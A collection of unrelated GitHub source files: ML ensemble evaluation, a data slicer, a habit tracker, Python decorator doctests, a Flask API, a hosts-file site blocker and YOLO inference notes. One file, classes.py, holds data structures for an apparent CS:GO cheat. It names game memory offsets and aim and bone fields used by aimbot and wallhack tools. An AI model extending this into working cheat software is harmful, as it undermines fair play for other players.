= boosting_dt.predict(attri_test) \r\n evaluation['Boosting_DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Boosting_DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = boosting_nb.predict(attri_test) \r\n evaluation['Boosting_NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Boosting_NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_knn.predict(attri_test) \r\n evaluation['Stacking_kNN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_kNN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_svm.predict(attri_test) \r\n evaluation['Stacking_SVM Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_SVM Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_dt.predict(attri_test) \r\n evaluation['Stacking_DT Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_DT Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_nn.predict(attri_test) \r\n evaluation['Stacking_NN Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_NN Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n predictions = stacking_nb.predict(attri_test) \r\n evaluation['Stacking_NB Micro_F1'] = f1_score(label_test, predictions, average='micro')\r\n evaluation['Stacking_NB Macro_F1'] = f1_score(label_test, predictions, average='macro')\r\n \r\n results = pd.DataFrame([evaluation])\r\n results.to_csv(\"results_\"+file)","repo_name":"luscafidelis/ensemble-study","sub_path":"estudo-ensemble.py","file_name":"estudo-ensemble.py","file_ext":"py","file_size_in_byte":9391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36293374082","text":"import threading\nfrom typing import List, Tuple\n\nfrom utils import get_windows_location\n\n\nclass Bone:\n \"\"\"骨骼节点\"\"\"\n\n def __init__(\n self, body: List[float], head: List[float],\n highest: List[float] = None, lowest: List[float] = None,\n l_feed: List[float] = None, r_feed: List[float] = None,\n ):\n self.body = body # 腰部身体节点\n self.head = head # 头节点\n self.highest = highest # 最高处节点\n self.lowest = lowest # 最低处节点\n self.l_feed = l_feed # 左脚节点\n self.r_feed = r_feed # 右脚节点\n\n\nclass Player:\n \"\"\"玩家\"\"\"\n _single_lock = threading.Lock()\n _instance = {}\n\n def __new__(cls, *args, **kwargs):\n if args:\n _entity = args[0]\n else:\n _entity = kwargs.get('entity')\n cls_ = cls._instance.get(_entity)\n if not cls_:\n with cls._single_lock:\n if not cls_:\n cls_ = super(Player, cls).__new__(cls)\n cls._instance[_entity] = cls_\n\n return cls_\n\n def __init__(\n self,\n entity: int,\n team_id: int,\n effective: bool = True,\n is_self: bool = False,\n location: tuple = None,\n healthy_blood: int = 100,\n armor: int = 100,\n bone: Bone = None,\n aim_len: int = 9999,\n squat: float = 0.0,\n screen: Tuple[float, float] = None,\n ):\n self.entity = entity # 人物矩阵地址\n self.team_id = team_id # 队伍id\n self.effective = effective\n self.is_self = is_self # 是否为自己\n self.location = location # 位置\n self.healthy_blood = healthy_blood # 血量\n self.armor = armor # 盔甲\n self.bone: Bone = bone # 骨骼\n self.aim_len = aim_len # 自瞄距离\n self.squat = squat # squat\n self.screen = screen # 屏幕坐标\n\n def __str__(self):\n return \"Player(0X%x->{team:%s, self:%s, location:%s, blood:%s, armor:%s})\" % (\n self.entity, self.team_id, self.is_self, self.location, self.healthy_blood, self.armor\n )\n\n __repr__ = __str__\n\n\nclass WindowsInfo:\n \"\"\"监听屏幕\"\"\"\n x, y, w, h = get_windows_location()\n\n\nclass Signature:\n \"\"\"特征值\"\"\"\n dwClientState: int\n dwEntityList: int\n dwViewMatrix: int\n dwLocalPlayer: int\n m_iTeamNum: int\n m_iHealth: int\n m_iGlowIndex: int\n m_vecOrigin: int\n m_ArmorValue: int\n m_iShotsFired: int\n m_dwBoneMatrix: int\n m_aimPunchAngle: int\n m_vecViewOffset: int\n dwGlowObjectManager: int\n dwClientState_ViewAngles: int\n\n\nclass Team:\n \"\"\"队伍阵营\"\"\"\n ct: int = 3\n t: int = 2\n","repo_name":"ItGarbager/csgo_cheat","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"40666063298","text":"from __future__ import annotations\nfrom typing import Union\nfrom domino._slice.abstract import Slicer\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.nn.functional import cross_entropy\nimport torch\nfrom sklearn.linear_model import LinearRegression, LogisticRegression, Ridge, Lasso\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tqdm import tqdm\nimport numpy as np\nimport meerkat as mk\n\nfrom ..utils import convert_to_torch, unpack_args, convert_to_numpy\n\n\nclass FusedSlicer(Slicer, nn.Module):\n def __init__(\n self,\n n_slices: int = 5,\n candidate_text: mk.DataFrame = None,\n text_column: Union[str, np.np.ndarray] = \"text\",\n text_embedding_column: Union[str, np.np.ndarray] = \"embedding\",\n device: Union[int, str] = \"cpu\",\n ):\n super().__init__(n_slices=n_slices)\n self.candidate_text, self.candidate_text_embeddings = unpack_args(\n candidate_text, text_column, text_embedding_column\n )\n (self.candidate_text_embeddings,) = convert_to_torch(\n self.candidate_text_embeddings\n )\n\n self.candidate_text_embeddings = self.candidate_text_embeddings\n\n self.device = device\n\n self.text_idxs = None\n self.text_embeddings = None\n self.text = None\n\n def _prepare_embs(self, *args):\n return [inp.to(device=self.device, dtype=torch.float) for inp in args]\n\n def fit(\n self,\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n targets: Union[str, np.ndarray] = None,\n pred_probs: Union[str, np.ndarray] = None,\n ) -> FusedSlicer:\n embeddings, targets, pred_probs = unpack_args(\n data, embeddings, targets, pred_probs\n )\n (embeddings,) = convert_to_torch(embeddings)\n targets, pred_probs = convert_to_numpy(targets, pred_probs)\n embeddings, candidate_text_embeddings = self._prepare_embs(\n embeddings, self.candidate_text_embeddings\n )\n with torch.no_grad():\n slice_scores = torch.matmul(embeddings, candidate_text_embeddings.T)\n\n slice_scores = slice_scores.cpu().numpy()\n\n l = targets - pred_probs\n\n #slice_scores = MinMaxScaler().fit_transform(slice_scores)\n lr = Ridge(normalize=True).fit(slice_scores, l) # Change this back!!!!\n\n coef = lr.coef_.squeeze()\n self.text_idxs = np.concatenate(\n [\n #np.argsort(coef)[: self.config.n_slices],\n np.argsort(-np.abs(coef))[: self.config.n_slices]\n ]\n )\n\n self.text_embeddings = candidate_text_embeddings[self.text_idxs]\n self.text = self.candidate_text[self.text_idxs]\n self.text_coefs = coef[self.text_idxs]\n\n return slice_scores \n\n def predict(\n self,\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n targets: Union[str, np.ndarray] = None,\n pred_probs: Union[str, np.ndarray] = None,\n losses: Union[str, np.ndarray] = None,\n ):\n return (\n self.predict(data, embeddings, targets, pred_probs, losses) > 0.5\n ).astype(int)\n\n def predict_proba(\n self,\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n targets: Union[str, np.ndarray] = None,\n pred_probs: Union[str, np.ndarray] = None,\n losses: Union[str, np.ndarray] = None,\n ):\n if self.text_embeddings is None:\n raise ValueError(\"Must call `fit` before `predict`.\")\n (embeddings,) = unpack_args(data, embeddings)\n (embeddings,) = convert_to_torch(embeddings)\n (embeddings,) = self._prepare_embs(embeddings)\n slice_scores = torch.matmul(embeddings, self.text_embeddings.T)\n return slice_scores.cpu().numpy()\n\n def describe(\n self,\n text_data: Union[dict, mk.DataFrame] = None,\n text_embeddings: Union[str, np.ndarray] = \"embedding\",\n text_descriptions: Union[str, np.ndarray] = \"description\",\n data: Union[dict, mk.DataFrame] = None,\n embeddings: Union[str, np.ndarray] = \"embedding\",\n num_descriptions: int = 3,\n ):\n output = []\n for pred_slice_idx in range(self.config.n_slices):\n output.append(\n {\n \"pred_slice_idx\": pred_slice_idx,\n \"scores\": [1],\n \"phrases\": [self.text[pred_slice_idx]],\n }\n )\n\n return output\n\n def to(self, *args, **kwargs):\n \"\"\"Intercept to on a device and set the self.device.\"\"\"\n if isinstance(args[0], (int, str, torch.device)):\n self.device = args[0]\n return super().to(*args, **kwargs)\n","repo_name":"HazyResearch/domino","sub_path":"domino/_slice/fused.py","file_name":"fused.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"66"} +{"seq_id":"71442749970","text":"\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import MutableMapping\nimport backend.datetime_extension\n\nclass Habit:\n \"\"\"\n Stores information about a habit, including the name, how frequently it needs\n to be completed, whether it has been completed or not, and its unique id.\n\n @author Team 1\n @version Spring 2022\n \"\"\"\n _name: str\n _id: int\n _reset_date: datetime\n _frequency: int\n\n def __init__(self, name: str, frequency: int, id: int):\n \"\"\"\n Creates a new Habit object with a specified name, frequency, and id.\n\n Precondition: isinstance(name, str) and\n not str.isspace(name) and\n isinstance(frequency, int) and\n frequency >= 0 and\n frequency <= 2 and\n isinstance(id, int)\n Postcondition: self.name == name and\n self.frequency == frequency and\n self.id == id\n \n Params - name: The name of the Habit.\n frequency: How frequently the habit should be completed.\n id: The habit's unique identifier.\n Return - None\n \"\"\"\n EPOCH_TIME = 30256871\n\n self.name = name\n self.frequency = frequency\n self._id = id\n self._reset_date = datetime.fromtimestamp(EPOCH_TIME)\n\n def complete(self) -> bool:\n \"\"\"\n Completes the habit, returning whether the habit was already complete.\n\n Precondition: None\n Postcondition: self.is_complete\n\n Params - None\n Return - [True] iff the habit was not already complete, otherwise [False]\n \"\"\"\n if self.is_complete:\n return False\n\n if self.frequency == CompletionFrequency.DAILY.value:\n self._reset_date = backend.datetime_extension.tomorrow()\n elif self.frequency == CompletionFrequency.WEEKLY.value:\n self._reset_date = backend.datetime_extension.next_sunday()\n else:\n self._reset_date = backend.datetime_extension.first_of_next_month()\n\n return True\n\n def create_json_dict(self) -> MutableMapping:\n return {\n \"name\": self._name,\n \"id\": self._id,\n \"frequency\": self._frequency,\n \"is_complete\": self.is_complete\n }\n\n @property\n def is_complete(self) -> bool:\n \"\"\"\n Gets whether the habit is complete or not.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - [True] if the Habit is complete, otherwise [False].\n \"\"\"\n return datetime.now() < self._reset_date\n\n @property\n def name(self) -> str:\n \"\"\"\n Gets the name of the habit.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - The name of the habit.\n \"\"\"\n return self._name\n \n @property\n def id(self) -> int:\n \"\"\"\n Gets the id of the habit.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - The id of the habit.\n \"\"\"\n return self._id\n\n @property\n def frequency(self) -> int:\n \"\"\"\n Gets the frequency of the habit.\n\n Precondition: None\n Postcondition: None\n\n Params - None\n Return - The frequency of the habit.\n \"\"\"\n return self._frequency\n \n @name.setter\n def name(self, name: str):\n \"\"\"\n Sets the name of the habit.\n\n Precondition: isinstance(name, str) and\n not str.isspace(name)\n Postcondition: self.name == name\n\n Params - name: The new name.\n Return - None\n \"\"\"\n if not isinstance(name, str):\n raise Exception(\"name must be a str\")\n if str.isspace(name):\n raise Exception(\"name must not be blank\")\n\n self._name = name\n\n @frequency.setter\n def frequency(self, frequency: int):\n \"\"\"\n Sets the name of the habit.\n\n Precondition: isinstance(name, int) and\n frequency >= 0 and\n frequency <= 2\n Postcondition: self.name == name\n\n Params - name: The new name.\n Return - None\n \"\"\"\n if not isinstance(frequency, int):\n raise Exception(\"frequency must be an int\")\n if frequency < CompletionFrequency.DAILY.value or frequency > CompletionFrequency.MONTHLY.value:\n raise Exception(\"frequency must be between 0 and 2, inclusive\")\n\n self._frequency = frequency\n\nclass CompletionFrequency(Enum):\n DAILY: int = 0\n WEEKLY: int = 1\n MONTHLY: int = 2\n","repo_name":"JACorley1/UWG-SE2-Spring22-Team1","sub_path":"server/backend/habit.py","file_name":"habit.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"27437931669","text":"# -*- coding: utf-8 -*-\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef node(l1, l2):\n length1, length2 = 0, 0\n # 求两个链表长度\n while l1.next:\n l1 = l1.next # 尾节点\n length1 += 1\n while l2.next:\n l2 = l2.next # 尾节点\n length2 += 1\n\n # 如果相交\n if l1.next == l2.next:\n # 长的链表先走\n if length1 > length2:\n for _ in range(length1 - length2):\n l1 = l1.next\n return l1 # 返回交点\n else:\n for _ in range(length2 - length1):\n l2 = l2.next\n return l2 # 返回交点\n # 如果不相交\n else:\n return\n","repo_name":"SulphurFH/NoteBook","sub_path":"Interview/15_cross_lint.py","file_name":"15_cross_lint.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"18861921224","text":"#!/usr/bin/env python3\n\"\"\"Functional Python Programming\n\nChapter 11, Example Set 1\n\"\"\"\nimport math\n\nfrom functools import wraps\ndef nullable( function ):\n @wraps(function)\n def null_wrapper( arg ):\n return None if arg is None else function(arg)\n return null_wrapper\n\n@nullable\ndef nlog( x ):\n return math.log(x)\n\n@nullable\ndef nround4( x ):\n return round(x,4)\n\ntest_Null_Log= \"\"\"\n>>> nlog = nullable( math.log )\n>>> some_data = [ 10, 100, None, 50, 60 ]\n>>> scaled = map( nlog, some_data )\n>>> [nround4(v) for v in scaled]\n[2.3026, 4.6052, None, 3.912, 4.0943]\n\n\"\"\"\n\nnlog = nullable( math.log )\nnround4= nullable( lambda x: round(x,4) )\n\ntest_Null_Log2= \"\"\"\n>>> some_data = [ 10, 100, None, 50, 60 ]\n>>> scaled = map( nlog, some_data )\n>>> [nround4(v) for v in scaled]\n[2.3026, 4.6052, None, 3.912, 4.0943]\n\"\"\"\n\ndef null2( function ):\n @wraps(function)\n def null_wrapper( *arg, **kw ):\n try:\n return function( *arg, **kw )\n except TypeError as e:\n if 'NoneType' in e.args[0]:\n return None\n raise\n return null_wrapper\n\ntest_null2= \"\"\"\n>>> ndivmod= null2( divmod )\n>>> ndivmod( None, 2 )\n>>> ndivmod( 2, None )\n>>> try:\n... ndivmod( \"22\", \"7\" )\n... except TypeError as e:\n... print(e)\nunsupported operand type(s) for divmod(): 'str' and 'str'\n\"\"\"\n\nimport logging, sys\ndef logged( function ):\n @wraps(function)\n def log_wrapper( *args, **kw ):\n log= logging.getLogger(function.__qualname__)\n try:\n result= function( *args, **kw )\n log.info( \"({0!r} {1!r}) => {2!r}\".format(args, kw, result) )\n except Exception as e:\n log.exception( \"({0!r} {1!r})\".format(args, kw) )\n raise e\n return log_wrapper\n\ntest_logged_divmod=\"\"\"\n>>> ldivmod= logged(divmod)\n>>> logging.basicConfig( stream=sys.stdout, level=logging.INFO )\n>>> try: # doctest: +ELLIPSIS\n... ldivmod( 3, None )\n... except Exception:\n... pass\nERROR:divmod:((3, None) {})\nTraceback (most recent call last):\n...\nTypeError: unsupported operand type(s) for divmod(): 'int' and 'NoneType'\n>>> ldivmod( 22, 7 )\nINFO:divmod:((22, 7) {}) => (3, 1)\n\"\"\"\n\nimport decimal\ndef bad_data( function ):\n @wraps(function)\n def wrap_bad_data( text, *args, **kw ):\n try:\n return function( text, *args, **kw )\n except (ValueError, decimal.InvalidOperation):\n cleaned= text.replace(\",\",\"\")\n return function( cleaned, *args, **kw )\n return wrap_bad_data\n\ntest_bad_data=\"\"\"\n>>> from decimal import Decimal\n>>> bd_int= bad_data( int )\n>>> bd_float= bad_data( float )\n>>> bd_decimal= bad_data( Decimal )\n>>> bd_int( \"13\" )\n13\n>>> bd_int( \"1,371\" )\n1371\n>>> bd_int( \"1,371\", base=16 )\n4977\n>>> bd_float(\"17\")\n17.0\n>>> bd_float(\"1,701\")\n1701.0\n>>> bd_decimal(19)\nDecimal('19')\n>>> bd_decimal(\"1,956\")\nDecimal('1956')\n\"\"\"\n\ndef clean_list( text, char_list ):\n if len(char_list) == 0: return text\n return clean_list( text.replace(char_list[0],\"\"), char_list[1:] )\n\nimport decimal\ndef bad_char_remove( *char_list ):\n def cr_decorator( function ):\n @wraps(function)\n def wrap_char_remove( text, *args, **kw ):\n try:\n return function( text, *args, **kw )\n except (ValueError, decimal.InvalidOperation):\n cleaned= clean_list( text, char_list )\n return function( cleaned, *args, **kw )\n return wrap_char_remove\n return cr_decorator\n\ntest_bad_char_remove=\"\"\"\n>>> from decimal import Decimal\n>>> @bad_char_remove(\"$\", \",\")\n... def currency(text, **kw):\n... return Decimal(text, **kw)\n>>> currency( \"13\" )\nDecimal('13')\n>>> currency( \"$3.14\" )\nDecimal('3.14')\n>>> currency( \"$1,701.00\" )\nDecimal('1701.00')\n\"\"\"\n\ndef then_convert( convert_function ):\n def then_convert_decorator( clean_function ):\n @wraps(clean_function)\n def cc_wrapper( text, *args, **kw ):\n try:\n return convert_function( text, *args, **kw )\n except (ValueError, decimal.InvalidOperation):\n cleaned= clean_function( text )\n return convert_function( cleaned, *args, **kw )\n return cc_wrapper\n return then_convert_decorator\n\ntest_then_convert_1=\"\"\"\n>>> @then_convert(int)\n... def drop_punct(text):\n... return text.replace(\",\",\"\").replace(\"$\",\"\")\n>>> drop_punct(\"1,701\")\n1701\n>>> drop_punct(\"97\")\n97\n>>>\n\"\"\"\n\ntest_then_convert_2=\"\"\"\n>>> def drop_punct(text):\n... return text.replace(\",\",\"\").replace(\"$\",\"\")\n>>> drop_punct_int = then_convert(int)(drop_punct)\n>>> drop_punct_int(\"1,701\")\n1701\n>>> drop_punct_int(\"97\")\n97\n>>>\n\"\"\"\n\ndef normalize( mean, stdev ):\n normalize = lambda x: (x-mean)/stdev\n def concrete_decorator( function ):\n @wraps(function)\n def wrapped( data_arg ):\n z = map( normalize, data_arg )\n return function( z )\n return wrapped\n return concrete_decorator\n\ntest_normalize = \"\"\"\n>>> d = [ 2, 4, 4, 4, 5, 5, 7, 9 ]\n>>> from Chapter_4.ch04_ex4 import mean, stdev\n>>> m_d, s_d = mean(d), stdev(d)\n>>> @normalize(m_d, s_d)\n... def norm_list(d):\n... return list(d)\n>>> norm_list(d)\n[-1.5, -0.5, -0.5, -0.5, 0.0, 0.0, 1.0, 2.0]\n>>> z = lambda x, m, s: (x-m)/s\n>>> list( z( x, mean(d), stdev(d) ) for x in d )\n[-1.5, -0.5, -0.5, -0.5, 0.0, 0.0, 1.0, 2.0]\n\n>>> @normalize(m_d, s_d)\n... def norm_sum(d):\n... return sum(d)\n>>> norm_sum(d)\n0.0\n\n\"\"\"\n\n__test__ = {\n \"test_Null_Log\": test_Null_Log,\n \"test_Null_Log2\": test_Null_Log2,\n \"test_null2\": test_null2,\n \"test_logged_divmod\": test_logged_divmod,\n \"test_bad_data\": test_bad_data,\n \"test_bad_char_remove\": test_bad_char_remove,\n \"test_then_convert_1\": test_then_convert_1,\n \"test_then_convert_2\": test_then_convert_2,\n \"test_normalize\": test_normalize,\n}\n\ndef test():\n import doctest\n doctest.testmod(verbose=1)\n\nif __name__ == \"__main__\":\n test()\n #performace()\n","repo_name":"xhd2015/Python","sub_path":"Functional-Python-Programming/Chapter_11/ch11_ex1.py","file_name":"ch11_ex1.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"66"} +{"seq_id":"20895593428","text":"# https://www.py4e.com/html3/03-conditional\n# Exercise 3.2 Rewrite your pay program using try and except so that your program handles non-numeric input gracefully by printing a message and exiting the program.\n\nhours = input(\"Enter Hours: \")\nrate = input(\"Enter Rate: \")\n\ntry:\n fh = float(hours)\n fr = float(rate)\nexcept:\n print(\"Error, please enter numeric input\")\n quit()\n\nif fh > 40:\n # Overtime\n ovtH = fh - 40\n ovtP = ovtH * (fr * 1.5)\n pay = (40 * fr) + ovtP\nelse:\n # Regular\n pay = fh * fr\n\nprint(\"Pay:\", pay)","repo_name":"Tezcatlipoca0000/my_py4e","sub_path":"exercise_3_2.py","file_name":"exercise_3_2.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14915521753","text":"from flask import jsonify, request\n\nfrom cctwin.api import bp\nfrom cctwin.assets.block.ambient_conditions import AmbientConditions\nfrom cctwin.assets.block.block_output import BlockSimulationOutputSchema, BlockBiddingOutputSchema\nfrom cctwin.assets.block.block_request import BlockBiddingRequest, BlockBiddingRequestSchema, BlockSimulationRequest, \\\n BlockSimulationRequestSchema\nfrom cctwin.helper.helper import get_db_temp_list\nfrom cctwin.twin import block_twin\n\n\n@bp.route('/simulation/simulate', methods=['POST'])\ndef simulate():\n data = request.get_json() or {}\n\n schema = BlockSimulationRequestSchema()\n block_simulation_request: BlockSimulationRequest = schema.load(data)\n\n db = block_simulation_request.ambient_conditions.db[0]\n rh = block_simulation_request.ambient_conditions.rh[0]\n baro = block_simulation_request.ambient_conditions.baro[0]\n\n db_list = get_db_temp_list(db)\n rh_list = [rh for _ in db_list]\n baro_list = [baro for _ in db_list]\n\n db_list.insert(0, db)\n rh_list.insert(0, rh)\n baro_list.insert(0, baro)\n\n block_simulation_request.ambient_conditions = AmbientConditions(db_list, rh_list, baro_list)\n\n block_output = block_twin.get_performance(block_simulation_request)\n\n schema = BlockSimulationOutputSchema()\n\n json_dict = schema.dump(block_output)\n\n response = jsonify(json_dict)\n response.status_code = 200\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Headers'] = '*'\n return response\n\n\n@bp.route('/bidding/simulate', methods=['POST'])\ndef prepare_bids():\n data = request.get_json() or {}\n\n schema = BlockBiddingRequestSchema()\n block_bidding_request: BlockBiddingRequest = schema.load(data)\n\n block_bidding_outputs = block_twin.get_data_for_bids(block_twin.create_block_configs(), block_bidding_request)\n\n schema = BlockBiddingOutputSchema()\n json_dict = schema.dump(block_bidding_outputs, many=True)\n\n response = jsonify(json_dict)\n response.status_code = 200\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Headers'] = '*'\n return response\n","repo_name":"ernebrown/NorteIII","sub_path":"cctwin/api/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24718573156","text":"from __future__ import print_function, division\n\nimport sys\ninpath = sys.argv[1]\n\nfrom numpy import *\nimport numpy as np\nimport scipy.io\ndata = scipy.io.loadmat( inpath )\n\nAs = data['A']\nas_ortho = data['a_ortho']\nas_full = data['a_full']\np = data['p'].ravel()\nB = data['B']\n\nif len( sys.argv ) == 3:\n np.savez_compressed( sys.argv[2], p = p, B = B )\n print( \"Saved p,B to:\", sys.argv[2] )\n\nprint( \"Number of flats:\", len(As) )\nprint( \"Ambient dimension:\", As.shape[-1] )\nprint( \"Given flat orthogonal dimension:\", As.shape[1] )\nprint( \"Solution flat dimension:\", B.shape[1] )\n\ntotal_a_deviation = 0.\ntotal_dist = 0.\n\nfor A, a_ortho, a_full in zip( As, as_ortho, as_full ):\n total_a_deviation += np.linalg.norm( A.dot( a_full ) - a_ortho )\n \n AB = np.dot( A, B )\n lh = np.dot( AB.T, AB )\n rh = -np.dot( AB.T, np.dot(A,p) - a_ortho )\n z = np.linalg.lstsq( lh, rh )[0].ravel()\n dist = np.dot( A, p + B.dot(z) ) - a_ortho\n total_dist += np.dot( dist, dist )\n\nprint( \"Total a ortho vs full deviation:\", total_a_deviation )\nprint( \"Total distance:\", total_dist )\n","repo_name":"CraGL/Hyperspectral-Inverse-Skinning","sub_path":"save_to_matlab_test.py","file_name":"save_to_matlab_test.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"5605528523","text":"import torch\nfrom torch import nn\n\n\nclass WeightOffsets(nn.Module):\n def __init__(self, row_dim, column_dim):\n super().__init__()\n self.v = nn.Parameter(torch.ones(1))\n self.linear1 = nn.Linear(1, row_dim)\n self.linear2 = nn.Linear(1, column_dim)\n self.linear_column = nn.Linear(row_dim, row_dim)\n self.linear_row = nn.Linear(column_dim, column_dim)\n\n def forward(self):\n vx = self.linear1(self.v) # (row_dim)\n vy = self.linear2(self.v) # (column_dim)\n # matrix multiplication -> (row_dim, column_dim)\n v_matrix = vx.unsqueeze(0).T * vy.unsqueeze(0)\n # columnwise\n v_matrix = self.linear_column(v_matrix.T)\n # rowwise\n v_matrix = self.linear_row(v_matrix.T)\n return v_matrix.T\n\n\nclass Model(nn.Module):\n def __init__(self):\n super().__init__()\n self.wo = WeightOffsets(32, 16)\n self.linear = nn.Linear(32, 16)\n self.init_weight = None\n self.wo_out = None\n self.linear.weight.register_hook(self.wo_backward)\n\n def wo_backward(self, grad):\n print(\"grad:\", grad)\n grad = grad * self.init_weight\n self.wo_out.backward(grad)\n\n def update_weight(self):\n if self.init_weight is None:\n self.init_weight = self.linear.weight.data.clone()\n self.wo_out = self.wo()\n self.linear.weight.data = self.init_weight * (1 + self.wo_out)\n\n def forward(self, x):\n self.update_weight()\n y = self.linear(x)\n return y\n\n\nif __name__ == '__main__':\n model = Model()\n # model = WeightOffsets(32, 16)\n # linear = torch.nn.Linear(32, 16)\n # # linear.requires_grad_(False)\n # init_weight = linear.weight.data.clone()\n optimizer = torch.optim.AdamW(model.wo.parameters(), lr=0.01)\n # train!\n model.train()\n optimizer.zero_grad()\n\n x = torch.randn(2, 32)\n y = torch.randn(2, 16)\n # wo_weight = model()\n print(model.wo.v)\n # linear.weight.data = init_weight * (1 + wo_weight)\n # out = linear(x)\n out = model(x)\n loss = nn.functional.mse_loss(y, out)\n # loss = wo_weight.sum()\n print(\"loss:\", loss)\n loss.backward()\n # grad = linear.weight.grad * init_weight\n # wo_weight.backward(grad)\n optimizer.step()\n print(model.wo.v)","repo_name":"mkshing/e4t-diffusion","sub_path":"e4t/weightoffsets.py","file_name":"weightoffsets.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"66"} +{"seq_id":"41767158165","text":"import time \r\nfrom datetime import datetime as dt \r\n\r\n# change hosts path according to your OS\r\nhosts_path =\"C:\\Windows\\System32\\drivers\\etc\\hosts\"\r\n# localhost's IP \r\nredirect = \"127.0.0.1\"\r\n\r\n# websites That you want to block\r\nno_of_site=int(input(\"how many no of site you want to block\"))\r\n\r\nfor i in range(1,no_of_site+1):\r\n website_list=[]\r\n website=input(\"enter the site url name: \")\r\n website_list.append(website)\r\n\r\nstartTime=int(input(\"enter the start time (in 24hrs format):\"))\r\nendTime=int(input(\"enter the end time (in 24hrs format):\"))\r\nwhile True: \r\n\r\n\t# time of your work \r\n\tif dt(dt.now().year, dt.now().month, dt.now().day,startTime)< dt.now() < dt(dt.now().year, dt.now().month, dt.now().day,endTime): \r\n\t\tprint(\"Working hours...time to block the site\") \r\n\t\twith open(hosts_path, 'r+') as file:\r\n\t\t\tcontent = file.read()\r\n\t\t\tfor site in website_list: \r\n\t\t\t\tif website in content: \r\n\t\t\t\t\tpass\r\n\t\t\t\telse: \r\n\t\t\t\t\t#wrinting the localhost ip and website\r\n\t\t\t\t\tfile.write(redirect + \" \" + website + \"\\n\") \r\n\telse: \r\n\t\twith open(hosts_path, 'r+') as file: \r\n\t\t\tcontent=file.readlines() \r\n\t\t\tfile.seek(0) \r\n\t\t\tfor line in content: \r\n\t\t\t\tif not any(website in line for website in website_list): \r\n\t\t\t\t\tfile.write(line) \r\n\r\n\t\t\t# removing hostnmes from host file \r\n\t\t\tfile.truncate() \r\n\r\n\t\tprint(\"Fun hours...unblocking all site\") \r\n\ttime.sleep(5) \r\n","repo_name":"tanya3007/Python-website-blocker","sub_path":"blocker.py","file_name":"blocker.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11117841619","text":"# %% [markdown]\n# # Inference\n# \n# You will probably use a `Submission.ipynb` kernel to run all the predictions. After training a YOLOv5 based object detector -> head to the artifacts page and download the best model -> upload the model as a Kaggle dataset -> Use it with the submission folder. \n# \n# > 📍 Note that you might have to clone the YOLOv5 repository in a Kaggle dataset as well. \n# \n# In this section, I will show you how you can do the inference and modify the predicted bounding box coordinates.\n\n# %%\n# TEST_PATH = '/kaggle/input/siim-covid19-resized-to-256px-jpg/test/' # absolute path\nTEST_PATH = '../input/test/' # absolute path\n\n# %% [markdown]\n# Since I am training the model in this kernel itself, I will not be using the method that I have described above. The best model is saved in the directory `project_name/exp*/weights/best.pt`. In `exp*`, * can be 1, 2, etc. \n\n# %%\n# MODEL_PATH = 'kaggle-siim-covid/exp/weights/best.pt'\nMODEL_PATH = '../models/exp1/best.pt'\n\n# %% [markdown]\n# ```\n# --weights {MODEL_PATH} \\ # path to the best model.\n# --source {TEST_PATH} \\ # absolute path to the test images.\n# --img {IMG_SIZE} \\ # Size of image\n# --conf 0.281 \\ # Confidence threshold (default is 0.25)\n# --iou-thres 0.5 \\ # IOU threshold (default is 0.45)\n# --max-det 3 \\ # Number of detections per image (default is 1000) \n# --save-txt \\ # Save predicted bounding box coordinates as txt files\n# --save-conf # Save the confidence of prediction for each bounding box\n# ```\n\n# 